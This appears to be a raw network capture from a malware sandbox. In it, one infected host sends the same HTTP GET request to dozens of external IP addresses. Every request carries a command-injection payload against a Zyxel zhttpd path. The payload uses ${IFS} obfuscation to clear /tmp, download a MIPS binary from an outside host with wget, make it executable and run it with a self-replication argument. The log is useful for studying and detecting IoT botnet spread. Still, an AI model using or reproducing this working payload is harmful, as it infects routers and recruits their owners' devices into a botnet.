                                          Jan 14, 2024 15:46:28.272559881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7307192.168.2.235135893.106.146.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272609949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7308192.168.2.235526638.9.194.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272625923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7309192.168.2.2338000210.93.193.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272645950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7310192.168.2.2348844179.213.138.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272701979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7311192.168.2.235442286.6.42.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272732019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7312192.168.2.2339188121.234.127.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272769928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7313192.168.2.234594462.182.161.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272779942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7314192.168.2.2333790109.137.90.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272789955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7315192.168.2.2358006213.133.22.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272847891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7316192.168.2.23479588.191.126.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272861004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7317192.168.2.233607498.66.22.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272878885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7318192.168.2.2352174130.121.167.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272913933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7319192.168.2.2353054195.210.95.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272936106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7320192.168.2.234935068.247.161.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272972107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7321192.168.2.236017691.2.145.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272989035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7322192.168.2.2341306167.4.71.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273025036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7323192.168.2.2333628219.59.32.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273066044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7324192.168.2.235584425.150.73.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273103952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7325192.168.2.2349294122.190.96.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273124933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7326192.168.2.2354800146.238.255.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273153067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7327192.168.2.2338132182.30.6.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273181915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7328192.168.2.2335554125.148.104.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273196936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7329192.168.2.2340182169.229.22.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273232937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7330192.168.2.234030861.223.85.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273258924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7331192.168.2.236096489.1.14.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273281097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7332192.168.2.234248498.77.225.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273325920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7333192.168.2.2355366152.184.35.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273345947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7334192.168.2.2340238109.198.111.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273366928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7335192.168.2.2349122138.51.255.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273392916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7336192.168.2.235349884.229.59.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273427010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7337192.168.2.2348330169.203.164.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273459911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7338192.168.2.2349066156.40.158.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273487091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7339192.168.2.233908613.33.0.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273530960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7340192.168.2.2351276196.24.128.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273533106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7341192.168.2.2337158135.16.168.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273569107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7342192.168.2.2355180217.171.157.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273587942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7343192.168.2.234130877.10.191.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273622990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7344192.168.2.2348670163.134.96.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273653984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7345192.168.2.2355000133.232.178.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273698092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7346192.168.2.2346848216.225.210.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273720980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7347192.168.2.2349368105.198.201.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273740053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7348192.168.2.233814637.68.12.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273776054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7349192.168.2.23512021.177.135.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273813009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7350192.168.2.2352376145.234.182.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273838997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7351192.168.2.2351670119.176.121.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273873091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7352192.168.2.235995812.79.218.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273902893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7353192.168.2.2360468102.157.168.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273935080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7354192.168.2.2334358150.57.209.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273951054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7355192.168.2.2336678221.21.159.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273983002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7356192.168.2.2338608134.226.18.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.273983002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7357192.168.2.2360012137.243.150.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274019957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7358192.168.2.2335512122.61.114.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274045944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7359192.168.2.235592471.75.10.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274080038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7360192.168.2.235404224.156.153.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274106979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7361192.168.2.2346732218.94.220.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274128914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7362192.168.2.235051086.148.89.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274175882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7363192.168.2.2341108145.25.18.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274185896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7364192.168.2.235450649.149.45.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274216890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7365192.168.2.2357040216.72.78.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274231911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7366192.168.2.234697889.55.170.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274282932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7367192.168.2.2351932191.176.185.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274317026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7368192.168.2.2336462173.69.175.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.274362087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7369192.168.2.2347268133.179.108.182443
                                          TimestampBytes transferredDirectionData
